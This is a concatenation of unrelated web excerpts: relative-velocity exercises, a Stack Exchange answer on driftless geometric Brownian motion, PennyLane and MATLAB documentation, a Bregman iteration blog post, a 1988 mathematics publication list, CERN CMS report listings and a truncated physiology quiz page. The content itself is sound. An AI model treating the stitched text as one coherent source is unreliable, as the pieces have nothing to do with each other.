Question 4: Two particles A and B are moving with velocities 30Km/h and 40Km/h respectively towards an intersection as shown in the figure. Find the velocity of particle A with respect to the velocity of particle B.
Given: vA = 30 Km/h and vB = 40 Km/h.
Figure shows they are moving in perpendicular directions.
Velocity of A with respect to earth: vAE = 30i
Velocity of B with respect to earth: vBE = -40j
Using the equation studied above, velocity of A with respect to B: vAB
Assuming that the earth is the connecting frame of reference here,
⇒ vAB = vAE - vBE
⇒ vAB = 30i - (-40j) = 30i + 40j
magnitude of this velocity is
⇒ |vAB| = √(30² + 40²) = √2500
⇒ |vAB| = 50 Km/h
Question 5: Two particles A and B are moving with velocities 10Km/h and 20Km/h respectively towards an intersection as shown in the figure. Find the velocity of particle A with respect to the velocity of particle B.
Given: vA = 10 Km/h and vB = 20 Km/h.
Figure shows they are moving in perpendicular directions.
Velocity of A with respect to earth: vAE = 10i
Velocity of B with respect to earth: vBE = -20j
Using the equation studied above, velocity of A with respect to B: vAB
Assuming that the earth is the connecting frame of reference here,
⇒ vAB = vAE - vBE
⇒ vAB = 10i - (-20j) = 10i + 20j
magnitude of this velocity is
⇒ |vAB| = √(10² + 20²) = √500
⇒ |vAB| = 10√5 ≈ 22.36 Km/h
https://stats.stackexchange.com/questions/336712/solution-geometric-brownian-brownian-motion-with-no-drift
# Solution: Geometric Brownian motion with no drift
This question has been asked before here (Geometric Brownian motion without drift), but I can't find what I want in the answers, so I'll ask again differently: for $\mu=0$, $$dX_t =\mu X_t dt + \sigma X_t dW_t = \sigma X_t dW_t$$ Does it become: $$(1)\ x_T = e^{\sigma(W_T-W_t)}$$ or $$(2)\ x_T = e^{0.5\sigma^2(T-t)+\sigma(W_T-W_t)}$$ (2) seems unlikely to me because the process is clearly a local martingale, but (2) is not.
The general solution is $$X_t=X_0 e^{(\mu-\frac{\sigma^2}{2})t+\sigma W_t}$$
If $\mu=0$, it is just $$X_t=X_0 e^{-\frac{\sigma^2}{2}t+\sigma W_t}$$
• I think that's buried in the general solution. Are you saying the closed-form general solution works for any $\mu$ other than zero? – eSurfsnake Mar 27 '18 at 5:36
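A small simulation sketch makes the sign in the exponent easy to check (the values X_0 = 1, sigma = 0.5, T = 1 and the path count are illustrative assumptions). Since the driftless process is a martingale, the sample mean of the correct solution should stay near X_0 = 1:

import numpy as np

rng = np.random.default_rng(1)
sigma, T, n_paths = 0.5, 1.0, 200_000
W_T = rng.standard_normal(n_paths) * np.sqrt(T)

x1 = np.exp(sigma * W_T)                        # exponent without a time correction
x2 = np.exp(-0.5 * sigma**2 * T + sigma * W_T)  # solution with the -sigma^2/2 term

print(x1.mean())  # roughly exp(sigma^2 T / 2) = 1.13; the mean drifts upward
print(x2.mean())  # roughly 1.0, consistent with E[X_T] = X_0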
https://docs.pennylane.ai/en/stable/introduction/interfaces.html?highlight=optimizers
PennyLane offers seamless integration between classical and quantum computations. Code up quantum circuits in PennyLane, compute gradients of quantum circuits, and connect them easily to the top scientific computing and machine learning libraries.
## Training and interfaces¶
The bridge between the quantum and classical worlds is provided in PennyLane via interfaces to automatic differentiation libraries. Currently, four libraries are supported: NumPy, PyTorch, JAX, and TensorFlow. PennyLane makes each of these libraries quantum-aware, allowing quantum circuits to be treated just like any other operation. Any automatic differentiation framework can be chosen with any device.
In PennyLane, an automatic differentiation framework is declared using the interface argument when creating a QNode, e.g.,
@qml.qnode(dev, interface="tf")
def my_quantum_circuit(...):
    ...
Note
If no interface is specified, PennyLane will default to the NumPy interface (powered by the autograd library).
This will allow native numerical objects of the specified library (NumPy arrays, JAX arrays, Torch Tensors, or TensorFlow Tensors) to be passed as parameters to the quantum circuit. It also makes the gradients of the quantum circuit accessible to the classical library, enabling the optimization of arbitrary hybrid circuits by making use of the library’s native optimizers.
When specifying an interface, the objects of the chosen framework are converted into NumPy objects and are passed to a device in most cases. Exceptions include cases when the devices support end-to-end computations in a framework. Such devices may be referred to as backpropagation or passthru devices.
See the interface-specific pages of the PennyLane documentation for walkthroughs of each interface.
In addition to the core automatic differentiation frameworks discussed above, PennyLane also provides higher-level classes for converting QNodes into both Keras and torch.nn layers:
• pennylane.qnn.KerasLayer(qnode, …): Converts a QNode() to a Keras Layer.
• pennylane.qnn.TorchLayer(qnode, …): Converts a QNode() to a Torch layer.
Note
QNodes that allow for automatic differentiation will always incur a small overhead on evaluation. If you do not need to compute quantum gradients of a QNode, specifying interface=None will remove this overhead and result in a slightly faster evaluation. However, gradients will no longer be available.
## Optimizers¶
Optimizers are objects which can be used to automatically update the parameters of a quantum or hybrid machine learning model. The optimizers you should use depend on your choice of classical autodifferentiation library, and they are available from different access points.
### NumPy¶
When using the standard NumPy framework, PennyLane offers some built-in optimizers. Some of these are specific to quantum optimization, such as the QNGOptimizer, LieAlgebraOptimizer, RotosolveOptimizer, RotoselectOptimizer, ShotAdaptiveOptimizer, and QNSPSAOptimizer. A minimal usage sketch follows the list below.
• AdagradOptimizer: Gradient-descent optimizer with past-gradient-dependent learning rate in each dimension.
• AdamOptimizer: Gradient-descent optimizer with adaptive learning rate, first and second moment.
• AdaptiveOptimizer: Optimizer for building fully trained quantum circuits by adding gates adaptively.
• GradientDescentOptimizer: Basic gradient-descent optimizer.
• LieAlgebraOptimizer: Lie algebra optimizer.
• MomentumOptimizer: Gradient-descent optimizer with momentum.
• NesterovMomentumOptimizer: Gradient-descent optimizer with Nesterov momentum.
• QNGOptimizer: Optimizer with adaptive learning rate, via calculation of the diagonal or block-diagonal approximation to the Fubini-Study metric tensor.
• RMSPropOptimizer: Root mean squared propagation optimizer.
• RotosolveOptimizer: Rotosolve gradient-free optimizer.
• RotoselectOptimizer: Rotoselect gradient-free optimizer.
• ShotAdaptiveOptimizer: Optimizer where the shot rate is adaptively calculated using the variances of the parameter-shift gradient.
• SPSAOptimizer: The Simultaneous Perturbation Stochastic Approximation (SPSA) method, a stochastic approximation algorithm for optimizing cost functions whose evaluation may involve noise.
• QNSPSAOptimizer: Quantum natural SPSA (QNSPSA) optimizer.
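As a minimal usage sketch (the one-qubit circuit, step size, and iteration count below are illustrative assumptions, not taken from this page), the built-in optimizers share a common step interface:

import pennylane as qml
from pennylane import numpy as np

dev = qml.device("default.qubit", wires=1)

@qml.qnode(dev)
def cost(theta):
    # A simple cost function: <Z> = cos(theta), minimized at theta = pi
    qml.RX(theta, wires=0)
    return qml.expval(qml.PauliZ(0))

opt = qml.GradientDescentOptimizer(stepsize=0.4)
theta = np.array(0.5, requires_grad=True)
for _ in range(100):
    theta = opt.step(cost, theta)  # one gradient-descent update

print(theta, cost(theta))  # theta approaches pi, cost approaches -1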
### PyTorch¶
If you are using the PennyLane PyTorch framework, you should import one of the native PyTorch optimizers (found in torch.optim).
### TensorFlow¶
When using the PennyLane TensorFlow framework, you will need to leverage one of the TensorFlow optimizers (found in tf.keras.optimizers).
### JAX¶
Check out the JAXopt and the Optax packages to find optimizers for the PennyLane JAX framework.
The interface between PennyLane and automatic differentiation libraries relies on PennyLane’s ability to compute or estimate gradients of quantum circuits. There are different strategies to do so, and they may depend on the device used.
When creating a QNode, you can specify the differentiation method like this:
@qml.qnode(dev, diff_method="parameter-shift")
def circuit(x):
    qml.RX(x, wires=0)
    return qml.probs(wires=0)
PennyLane currently provides the following differentiation methods for QNodes:
### Simulation-based differentiation¶
The following methods use reverse accumulation to compute gradients; a well-known example of this approach is backpropagation. These methods are not hardware compatible; they are only supported on statevector simulator devices such as default.qubit.
However, for rapid prototyping on simulators, these methods typically outperform forward-mode accumulators such as the parameter-shift rule and finite differences. For more details, see the quantum backpropagation demonstration.
• "backprop": Use standard backpropagation.
This differentiation method is only allowed on simulator devices that are classically end-to-end differentiable, for example default.qubit. This method does not work on devices that estimate measurement statistics using a finite number of shots; please use the parameter-shift rule instead.
• "adjoint": Use a form of backpropagation that takes advantage of the unitary or reversible nature of quantum computation.
The adjoint method reverses through the circuit after a forward pass by iteratively applying the inverse (adjoint) gate. This method is similar to "backprop", but has significantly lower memory usage and a similar runtime.
### Hardware-compatible differentiation¶
The following methods support both quantum hardware and simulators, and are examples of forward accumulation. However, when using a simulator, you may notice that the time required to compute the gradients with these methods scales linearly with the number of trainable circuit parameters.
• "parameter-shift": Use the analytic parameter-shift rule for all supported quantum operation arguments, with finite-difference as a fallback.
• "finite-diff": Use numerical finite-differences for all quantum operation arguments.
• "device": Queries the device directly for the gradient. Only allowed on devices that provide their own gradient computation.
Note
If not specified, the default differentiation method is diff_method="best". PennyLane will attempt to determine the best differentiation method given the device and interface. Typically, PennyLane will prioritize device-provided gradients, backpropagation, parameter-shift rule, and finally finite differences, in that order.
In addition to registering the differentiation method of QNodes to be used with autodifferentiation frameworks, PennyLane also provides a library of gradient transforms via the qml.gradients module.
Quantum gradient transforms are strategies for computing the gradient of a quantum circuit that work by transforming the quantum circuit into one or more gradient circuits. They accompany these circuits with a function that post-processes their output. These gradient circuits, once executed and post-processed, return the gradient of the original circuit.
Examples of quantum gradient transforms include finite-difference rules and parameter-shift rules; these can be applied directly to QNodes:
dev = qml.device("default.qubit", wires=2)
@qml.qnode(dev)
def circuit(weights):
    qml.RX(weights[0], wires=0)
    qml.RY(weights[1], wires=1)
    qml.CNOT(wires=[0, 1])
    qml.RX(weights[2], wires=1)
    return qml.probs(wires=1)
>>> weights = np.array([0.1, 0.2, 0.3], requires_grad=True)
>>> qml.gradients.param_shift(circuit)(weights)
tensor([[-0.04673668, -0.09442394, -0.14409127],
        [ 0.04673668,  0.09442394,  0.14409127]], requires_grad=True)
Note that, while gradient transforms allow quantum gradient rules to be applied directly to QNodes, this is not a replacement — and should not be used instead of — standard training workflows (for example, qml.grad() if using Autograd, loss.backward() for PyTorch, or tape.gradient() for TensorFlow). This is because gradient transforms do not take into account classical computation nodes, and only support gradients of QNodes. For more details on available gradient transforms, as well as learning how to define your own gradient transform, please see the qml.gradients documentation.
## Differentiating gradient transforms and higher-order derivatives¶
Gradient transforms are themselves differentiable, which allows higher-order derivatives (such as the Hessian) to be computed:
dev = qml.device("default.qubit", wires=2)
@qml.qnode(dev)
def circuit(weights):
    qml.RX(weights[0], wires=0)
    qml.RY(weights[1], wires=1)
    qml.CNOT(wires=[0, 1])
    qml.RX(weights[2], wires=1)
    return qml.expval(qml.PauliZ(1))
>>> weights = np.array([0.1, 0.2, 0.3], requires_grad=True)
>>> qml.gradients.param_shift(circuit)(weights)
array([[-0.09347337, -0.18884787, -0.28818254]])
>>> qml.jacobian(qml.gradients.param_shift(circuit))(weights)
array([[[-0.9316158 ,  0.01894799,  0.0289147 ],
        [ 0.01894799, -0.9316158 ,  0.05841749],
        [ 0.0289147 ,  0.05841749, -0.9316158 ]]])
Another way to compute higher-order derivatives is by passing the max_diff and diff_method arguments to the QNode and by successive differentiation:
@qml.qnode(dev, diff_method="parameter-shift", max_diff=2)
def circuit(weights):
    qml.RX(weights[0], wires=0)
    qml.RY(weights[1], wires=1)
    qml.CNOT(wires=[0, 1])
    qml.RX(weights[2], wires=1)
    return qml.expval(qml.PauliZ(1))
>>> weights = np.array([0.1, 0.2, 0.3], requires_grad=True)
>>> qml.jacobian(qml.jacobian(circuit))(weights) # hessian
array([[-0.9316158 , 0.01894799, 0.0289147 ],
       [ 0.01894799, -0.9316158 , 0.05841749],
       [ 0.0289147 , 0.05841749, -0.9316158 ]])
Note that the max_diff argument only applies to gradient transforms and that its default value is 1; failing to set its value correctly may yield incorrect results for higher-order derivatives. Also, passing diff_method="parameter-shift" is equivalent to passing diff_method=qml.gradients.param_shift.
## Supported configurations¶
The table below shows all the currently supported functionality for the "default.qubit" device. At the moment, it takes into account the following parameters:
• The interface, e.g. "jax"
• The differentiation method, e.g. "parameter-shift"
• The return value of the QNode, e.g. qml.expval() or qml.probs()
• The number of shots, either None or an integer > 0
Cell entries refer to the numbered notes below the table.

| Interface | Differentiation method | state | density matrix | probs | sample | expval (obs) | expval (herm) | expval (proj) | var | vn entropy | mutual info |
| --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
| None | "device" | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 |
| None | "backprop" | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 |
| None | "adjoint" | 2 | 2 | 2 | 2 | 2 | 2 | 2 | 2 | 2 | 2 |
| None | "parameter-shift" | 2 | 2 | 2 | 2 | 2 | 2 | 2 | 2 | 2 | 2 |
| None | "finite-diff" | 2 | 2 | 2 | 2 | 2 | 2 | 2 | 2 | 2 | 2 |
| "autograd" | "device" | 3 | 3 | 3 | 3 | 3 | 3 | 3 | 3 | 3 | 3 |
| "autograd" | "backprop" | 4 | 4 | 5 | 9 | 5 | 5 | 5 | 5 | 5 | 5 |
| "autograd" | "adjoint" | 6 | 6 | 6 | 6 | 7 | 7 | 7 | 6 | 6 | 6 |
| "autograd" | "parameter-shift" | 10 | 10 | 8 | 9 | 8 | 8 | 8 | 8 | 10 | 10 |
| "autograd" | "finite-diff" | 10 | 10 | 8 | 9 | 8 | 8 | 8 | 8 | 8 | 8 |
| "jax" | "device" | 3 | 3 | 3 | 3 | 3 | 3 | 3 | 3 | 3 | 3 |
| "jax" | "backprop" | 5 | 5 | 5 | 9 | 5 | 5 | 5 | 5 | 5 | 5 |
| "jax" | "adjoint" | 6 | 6 | 6 | 6 | 7 | 7 | 7 | 6 | 6 | 6 |
| "jax" | "parameter-shift" | 10 | 10 | 8 | 9 | 8 | 8 | 8 | 8 | 10 | 10 |
| "jax" | "finite-diff" | 10 | 10 | 8 | 9 | 8 | 8 | 8 | 8 | 8 | 8 |
| "tf" | "device" | 3 | 3 | 3 | 3 | 3 | 3 | 3 | 3 | 3 | 3 |
| "tf" | "backprop" | 5 | 5 | 5 | 9 | 5 | 5 | 5 | 5 | 5 | 5 |
| "tf" | "adjoint" | 6 | 6 | 6 | 6 | 7 | 7 | 7 | 6 | 6 | 6 |
| "tf" | "parameter-shift" | 10 | 10 | 8 | 9 | 8 | 8 | 8 | 8 | 10 | 10 |
| "tf" | "finite-diff" | 10 | 10 | 8 | 9 | 8 | 8 | 8 | 8 | 8 | 8 |
| "torch" | "device" | 3 | 3 | 3 | 3 | 3 | 3 | 3 | 3 | 3 | 3 |
| "torch" | "backprop" | 5 | 5 | 5 | 9 | 5 | 5 | 5 | 5 | 5 | 5 |
| "torch" | "adjoint" | 6 | 6 | 6 | 6 | 7 | 7 | 7 | 6 | 6 | 6 |
| "torch" | "parameter-shift" | 10 | 10 | 8 | 9 | 8 | 8 | 8 | 8 | 10 | 10 |
| "torch" | "finite-diff" | 10 | 10 | 8 | 9 | 8 | 8 | 8 | 8 | 8 | 8 |
1. Not supported. Gradients are not computed even though diff_method is provided. Fails with error.
2. Not supported. Gradients are not computed even though diff_method is provided. Warns that no auto-differentiation framework is being used, but does not fail. Forward pass is still supported.
3. Not supported. The default.qubit device does not provide a native way to compute gradients. See Device jacobian for details.
4. Supported, but only when shots=None. See Backpropagation for details. If the circuit returns a state, then the circuit itself is not differentiable directly. However, any real scalar-valued post-processing done to the output of the circuit will be differentiable. See State gradients for details.
5. Supported, but only when shots=None. See Backpropagation for details.
6. Not supported. The adjoint differentiation algorithm is only implemented for computing the expectation values of observables. See Adjoint differentiation for details.
7. Supported. Raises a warning when shots>0 since the gradient is always computed analytically. See Adjoint differentiation for details.
8. Supported.
9. Not supported. The discretization of the output caused by wave function collapse is not differentiable. The forward pass is still supported. See Sample gradients for details.
10. Not supported. “We just don’t have the theory yet.”
https://it.mathworks.com/help/vision/ref/opticalflowhs.estimateflow.html
# estimateFlow
Estimate optical flow
## Description
flow = estimateFlow(opticFlow,I) estimates optical flow between two consecutive video frames.
## Examples
Create a VideoReader object for the input video file, visiontraffic.avi. Specify the timestamp of the frame to read as 11.
vidReader = VideoReader('visiontraffic.avi','CurrentTime',11);
Specify the optical flow estimation method as opticalFlowHS. The output is an object specifying the optical flow estimation method and its properties.
opticFlow = opticalFlowHS
opticFlow =
opticalFlowHS with properties:
Smoothness: 1
MaxIteration: 10
VelocityDifference: 0
Create a custom figure window to visualize the optical flow vectors.
h = figure;
movegui(h);
hViewPanel = uipanel(h,'Position',[0 0 1 1],'Title','Plot of Optical Flow Vectors');
hPlot = axes(hViewPanel);
Read image frames from the VideoReader object and convert them to grayscale images. Estimate the optical flow from consecutive image frames. Display the current image frame and plot the optical flow vectors as a quiver plot.
while hasFrame(vidReader)
    frameRGB = readFrame(vidReader);
    frameGray = im2gray(frameRGB);
    flow = estimateFlow(opticFlow,frameGray);
    imshow(frameRGB)
    hold on
    plot(flow,'DecimationFactor',[5 5],'ScaleFactor',60,'Parent',hPlot);
    hold off
    pause(10^-3)
end
## Input Arguments
Object for optical flow estimation, specified as an optical flow estimator object, such as opticalFlowHS or opticalFlowLKDoG.
The input opticFlow defines the optical flow estimation method and its properties used for estimating the optical flow velocity matrices.
Current video frame, specified as a 2-D grayscale image of size m-by-n. The input image is generated from the current video frame read using the VideoReader object. The video frames in RGB format must be converted to 2-D grayscale images for estimating the optical flow.
## Output Arguments
Object for storing optical flow velocity matrices, returned as an opticalFlow object.
## Algorithms
The function estimates the optical flow of the input video using the method specified by the input object opticFlow. The optical flow is estimated as the motion between two consecutive video frames. The video frame T at the given instant tcurrent is referred to as the current frame, and the video frame T-1 is referred to as the previous frame. The initial value of the previous frame at time tcurrent = 0 is set as a uniform image of grayscale value 0.
Note
If you specify opticFlow as an opticalFlowLKDoG object, then the estimation is delayed by an amount relative to the number of video frames. The amount of delay depends on the value of NumFrames defined in the opticalFlowLKDoG object. The optical flow estimated for a video frame at tcurrent corresponds to the video frame at time $t_{flow} = t_{current} - (NumFrames - 1)/2$, where tcurrent is the time of the current video frame.
## Version History
Introduced in R2015a
http://nuit-blanche.blogspot.com/2012/05/error-forgetting-of-bregman-iteration.html
## Monday, May 07, 2012
### Error Forgetting of Bregman Iteration (demo)
The following paper and attendant demo/code "explain why solving Bregman subproblems at low accuracies (1e-6) gives a Bregman solution at near the machine precision (1e-15)."
Error Forgetting of Bregman Iteration by Wotao Yin, Stanley Osher. The abstract reads:
Abstract: This short article analyzes an interesting property of the Bregman iterative procedure, which is equivalent to the augmented Lagrangian method, for minimizing a convex piecewise linear function $J(x)$ subject to linear constraints $Ax = b$. The procedure obtains its solution by solving a sequence of unconstrained subproblems of minimizing $J(x) + \frac{1}{2}\|Ax - b^k\|_2^2$, where $b^k$ is iteratively updated. In practice, the subproblem at each iteration is solved at a relatively low accuracy. Let $w^k$ denote the error introduced by early stopping a subproblem solver at iteration $k$. We show that if all $w^k$ are sufficiently small so that Bregman iteration enters the optimal face, then while on the optimal face, Bregman iteration enjoys an interesting error-forgetting property: the distance between the current point $x^k$ and the optimal solution set $X$ is bounded by $\|w^{k+1} - w^k\|$, independent of the previous errors $w^{k-1}, w^{k-2}, \ldots, w^1$. This property partially explains why the Bregman iterative procedure works well for sparse optimization and, in particular, for $\ell_1$-minimization. The error-forgetting property is unique to $J(x)$ that is a piecewise linear function (also known as a polyhedral function), and the results of this article appear to be new to the literature of the augmented Lagrangian method.
The demo code is here.
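To make the structure of the procedure concrete, here is a minimal, illustrative Python sketch of Bregman iteration for constrained $\ell_1$-minimization (this is not the linked demo code; the ISTA inner solver and all parameter values are assumptions):

import numpy as np

def soft(v, t):
    # Soft-thresholding: the proximal operator of t * ||.||_1
    return np.sign(v) * np.maximum(np.abs(v) - t, 0.0)

def bregman_l1(A, b, mu=10.0, outer=50, inner=200):
    # min ||x||_1 s.t. Ax = b, via subproblems min ||x||_1 + (mu/2)||Ax - b_k||^2
    x = np.zeros(A.shape[1])
    b_k = b.copy()                                 # iteratively updated right-hand side
    step = 1.0 / (mu * np.linalg.norm(A, 2) ** 2)  # ISTA step size
    for _ in range(outer):
        for _ in range(inner):                     # inexact subproblem solve
            grad = mu * A.T @ (A @ x - b_k)
            x = soft(x - step * grad, step)
        b_k = b_k + (b - A @ x)                    # Bregman update: add back the residual
    return x

rng = np.random.default_rng(0)
A = rng.standard_normal((40, 100))
x_true = np.zeros(100)
x_true[rng.choice(100, 5, replace=False)] = rng.standard_normal(5)
b = A @ x_true
print(np.linalg.norm(A @ bregman_l1(A, b) - b))  # constraint residual keeps shrinking

Even with loosely solved subproblems, the outer loop drives the constraint residual toward zero, which is the error-forgetting behavior the paper analyzes.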
http://dms.umontreal.ca/~andrew/1988.php
1988 Publications
The First Case of Fermat's Last Theorem is true for all prime exponents up to $$714,591,416,091,389$$ (with Michael B. Monagan) Transactions of the American Mathematical Society, 306 (1988), 329-359 .
We show that if the first case of Fermat's Last Theorem is false for prime exponent $$p$$ then $$p^2$$ divides $$q^p-q$$ for all primes $$q\leq 89$$. The title theorem follows.
Article
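The divisibility criterion above is straightforward to test computationally. Here is a small, hedged Python sketch (not the authors' code; the function name and demo primes are illustrative) that checks whether $$p^2$$ divides $$q^p-q$$ for all primes $$q\leq 89$$ using modular exponentiation:

PRIMES_UP_TO_89 = (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37, 41,
                   43, 47, 53, 59, 61, 67, 71, 73, 79, 83, 89)

def satisfies_criterion(p):
    # True iff p^2 divides q^p - q for every prime q <= 89
    p2 = p * p
    return all((pow(q, p, p2) - q) % p2 == 0 for q in PRIMES_UP_TO_89)

print(satisfies_criterion(7))                      # False: fails already at q = 2
print((pow(2, 1093, 1093**2) - 2) % 1093**2 == 0)  # True: 1093 is a Wieferich prime

Roughly speaking, only a prime surviving all of these tests could yield a failure of the first case, which is why the criterion produces such large bounds.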
On Sophie Germain type criteria for Fermat's Last Theorem (with Barry J. Powell) Acta Arithmetica, 50 (1988), 265-277.
Variations on Sophie Germain's Theorem
Article
Nested Steiner $$n$$-cycle systems and perpendicular arrays (with Alexandros Moisiadis and Rolf Rees) Journal of Combinatorial Mathematics and Mathematical Computing , 3 (1988), 163-167.
We prove that for any odd $$n>1$$ and sufficiently large $$m$$ there exists a nested Steiner $$n$$-cycle system of order $$m$$ if and only if $$m\equiv 1 \pmod {2n}$$.
Article
Bipartite planes (with Alexandros Moisiadis and Rolf Rees) Congressus Numerantium, 61 (1988), 241-248.
For which integers $$s, t$$ and $$n=2st$$ does there exist a decomposition of the complete graph on $$n$$ vertices into $$n-1$$ copies of the complete $$(s,t)$$-bipartite graph?
Article
http://cds.cern.ch/collection/CMS%20Conference%20Reports?ln=zh_TW&as=1
CMS Conference Reports
2018-07-17
10:43
Search and measurement of the SM Higgs boson / Donato, Silvio (Zurich U.) /ATLAS and CMS Collaborations After the success of the LHC Run-1 physics program, the ATLAS and CMS Collaborations have presented their results obtained with the first $\sim 36\,\textnormal{fb}^{-1}$ of integrated luminosity delivered by the LHC at $\sqrt{s} = 13\,\textnormal{TeV}$ in Run-2. We present the main results obtained on the Standard Model Higgs boson, including the searches for specific decay and production channels, and the measurements of the Higgs boson couplings and differential cross section.. CMS-CR-2018-114.- Geneva : CERN, 2018 - 10 p. Fulltext: PDF; In : XXXII Rencontres de Physique de La Vallée d'Aoste, La Thuile(ao), Italy, 25 Feb - 3 Mar 2018
2018-07-16
10:53
Interpretation of non-MET+X ATLAS and CMS searches for dark matter scenarios / Wulz, Claudia (Vienna, OAW) /ATLAS, CMS and SUSY Collaborations Dark matter searches by the ATLAS and CMS experiments at the CERN LHC in final states with no missing transverse energy are presented, using channels with dileptons and dijets, in particular. Through a study of dijet angular distributions, the low-mass mediator regions have been explored for the first time. Most of the analyses were performed with data recorded at a centre-of-mass energy of 13 TeV. CMS-CR-2018-125.- Geneva : CERN, 2018 - 8 p. Fulltext: PDF; In : an Alpine LHC Physics Summit, Obergurgl, Austria, 15 - 20 Apr 2018
2018-07-13
09:13
Measurement of collective flow in XeXe collisions at 5.44 TeV with the CMS experiment / Stojanovic, Milan (VINCA Inst. Nucl. Sci., Belgrade) /CMS Collaboration New measurements of collective flow in XeXe collisions at a center-of-mass energy of 5.44 TeV per nucleon pair, collected by the CMS experiment at the LHC, are presented. The $v_{2}$, $v_{3}$ and $v_{4}$ Fourier coefficients of the anisotropic azimuthal distribution are obtained employing three different analysis techniques: two-particle correlations, the scalar product method, and multiparticle cumulants, which have different sensitivities to non-flow and flow fluctuation effects. [...] CMS-CR-2018-123.- Geneva : CERN, 2018 - 5 p. Fulltext: PDF; In : The 27th International Conference on Ultrarelativistic Nucleus-Nucleus Collisions, Venice, Italy, 13 - 19 May 2018
2018-07-13
09:13
Beyond nPDF effects: Prompt J/$\psi$ and $\psi(2S)$ production in pPb collisions with the CMS detector / Oh, Geonhee (Chonnam Natl. U.) /CMS Collaboration Measurements of prompt $\psi$(2S) meson production cross sections in proton-lead (pPb) and proton-proton (pp) collisions at a nucleon-nucleon center-of-mass energy of $\sqrt{s_{NN}}$ = 5.02 TeV are reported. The results are based on pPb and pp data collected by the CMS experiment at the LHC, corresponding to integrated luminosities of 34.6 $\mathrm{nb^{-1}}$ and 28.0 $\mathrm{pb^{-1}}$, respectively. [...] CMS-CR-2018-118.- Geneva : CERN, 2018 - 5 p. Fulltext: PDF; In : The 27th International Conference on Ultrarelativistic Nucleus-Nucleus Collisions, Venice, Italy, 13 - 19 May 2018
2018-07-13
09:13
Fragmentation of ${\rm J}\hspace{-.08em}/\hspace{-.14em}\psi$ in jets in pp collisions at $\sqrt{s} = 5.02~\mathrm{TeV}$ / Diab, Batoul (Ecole Polytechnique) /CMS Collaboration The fragmentation of jets containing a ${\rm J}\hspace{-.08em}/\hspace{-.14em}\psi$ meson is studied in 5.02 TeV pp data using an integrated luminosity of ${\cal L} = 27.39~\mathrm{pb^{-1}}$. The fraction of the jet transverse momentum $p_{\rm T,jet}$ carried by the ${\rm J}\hspace{-.08em}/\hspace{-.14em}\psi$ is measured for prompt ${\rm J}\hspace{-.08em}/\hspace{-.14em}\psi$ and ${\rm J}\hspace{-.08em}/\hspace{-.14em}\psi$ coming from b hadron decays, named nonprompt. [...] CMS-CR-2018-115.- Geneva : CERN, 2018 - 4 p. Fulltext: PDF; In : The 27th International Conference on Ultrarelativistic Nucleus-Nucleus Collisions, Venice, Italy, 13 - 19 May 2018
2018-07-13
09:13
D$^0$ Meson R$_{AA}$ in PbPb Collisions at $\sqrt s_{NN}$ = 5.02 TeV and Elliptic Flow in pPb Collisions at $\sqrt s_{NN}$ = 8.16 TeV with CMS / SHI, Zhaozhong (MIT) /CMS Collaboration The study of charm production in heavy-ion collisions is considered an excellent probe to study the properties of the hot and dense medium created in heavy-ion collisions. Measurements of D-meson nuclear modification can provide strong constraints on the mechanisms of in-medium energy loss and charm flow in the medium. [...] CMS-CR-2018-112.- Geneva : CERN, 2018 - 5 p. Fulltext: PDF; In : The 27th International Conference on Ultrarelativistic Nucleus-Nucleus Collisions, Venice, Italy, 13 - 19 May 2018
2018-07-13
09:13
Search for the chiral magnetic effect at the LHC with the CMS experiment / Tu, Zhoudunming (Rice U.) /CMS Collaboration Searches for the chiral magnetic effect (CME) using charge-dependent azimuthal correlations with respect to event planes are presented in PbPb collisions at 5.02 TeV and pPb collisions at 5.02 and 8.16 TeV, with the CMS experiment at the LHC. The azimuthal correlations with respect to the second- and third-order event planes are explored as a function of pseudorapidity, transverse momentum, and event multiplicity, which provides new insights into the underlying background correlations. [...] CMS-CR-2018-103.- Geneva : CERN, 2018 - 5 p. Fulltext: PDF; In : The 27th International Conference on Ultrarelativistic Nucleus-Nucleus Collisions, Venice, Italy, 13 - 19 May 2018
2018-07-13
09:13
Particle Flow and PUPPI in the Level-1 trigger at CMS for the HL-LHC / Kreis, Benjamin Jonah (Fermilab) /CMS Collaboration With the planned addition of tracking information to the Compact Muon Solenoid (CMS) Level-1 trigger for the High-Luminosity Large Hadron Collider (HL-LHC), the trigger algorithms can be completely reconceptualized. We explore the feasibility of using Particle Flow-like reconstruction and pileup per particle identification (PUPPI) pileup mitigation at the hardware trigger level. [...] CMS-CR-2018-096.- Geneva : CERN, 2018 - 7 p. Fulltext: PDF; In : 4th International Workshop Connecting The Dots 2018, Seattle, Washington, 20 - 22 Mar 2018
2018-07-13
09:13
State and Prospects of BSM Searches at the LHC / Spiezia, Aniello (Beijing, Inst. High Energy Phys.) /ATLAS and CMS Collaborations In the last years, the ATLAS and CMS experiments at LHC have recorded more than 100 fb$^{-1}$ of data that are used to investigate with high precision many aspects of high energy physics. In this conference proceeding, I will review the most recent and interesting results related to the search of new physics at the ATLAS and CMS experiments.. CMS-CR-2018-069.- Geneva : CERN, 2018 - 11 p. Fulltext: PDF; In : an Alpine LHC Physics Summit, Obergurgl, Austria, 15 - 20 Apr 2018
2018-07-13
09:12
Forward and Low-x Physics in the CMS Experiment / Sunar Cerci, Deniz (Cukurova U.) /CMS Collaboration Forward physics measurements with the Compact Muon Solenoid (CMS) experiment, one of the two large multi-purpose experiments at the Large Hadron Collider (LHC) at CERN, cover a wide range of physics subjects. HF and CASTOR, the forward calorimeters of the CMS, are used to collect the data up to pseudo-rapidity of 6.6. [...] CMS-CR-2018-064.- Geneva : CERN, 2018 - 5 p. Fulltext: PDF; In : 2nd Iran-Turkey joint conference on LHC physics, Tehran, Iran, 23 - 26 Oct 2017
https://www.techwhiff.com/learn/question-15-2-points-which-of-the-following/331915
Question 15 (2 points) Which of the following matches the effects of the autonomic nervous system...
Question:
Question 15 (2 points) Which of the following matches the effects of the autonomic nervous system subdivisions on ion channels in effector cells when controlling heart rate? 1) parasympathetic nervous system opens calcium channels 2) parasympathetic nervous system opens potassium channels 3) sympathetic nervous system opens chloride channels Question 16 (2 points) Acetylcholine binds to nicotinic receptors, which causes this ion channel to open. How is this channel gated? 1) voltage 2) antagonistically 3) mechanically
Similar Solved Questions
Monopolistic competition differs from perfect competition primarily because in monopolistic competition, entry into the industry is...
